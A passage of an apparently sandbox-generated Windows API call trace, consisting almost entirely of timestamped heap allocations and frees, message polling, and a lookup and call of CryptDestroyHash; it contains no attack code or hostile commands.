1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0151.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0151.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0151.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0151.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0151.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0151.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0151.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0151.220] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0151.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0151.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0151.221] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0151.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0151.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0151.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cb0 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509f8 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b30 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0151.222] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0151.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0151.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a28 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0151.222] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0151.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0151.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0151.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0151.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0151.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0151.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0151.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0151.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0151.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0151.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0151.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0151.224] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0151.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0151.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0151.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a28 [0151.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0151.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0151.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0151.225] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0151.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0151.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0151.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0151.225] CryptDestroyHash (hHash=0xa875d0) returned 1 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0151.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0151.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0151.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0151.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0151.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0151.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0151.227] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0151.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0151.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0151.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0151.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0151.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0151.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0151.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0151.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0151.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0151.228] HeapFree (in: hHeap=0x970000, 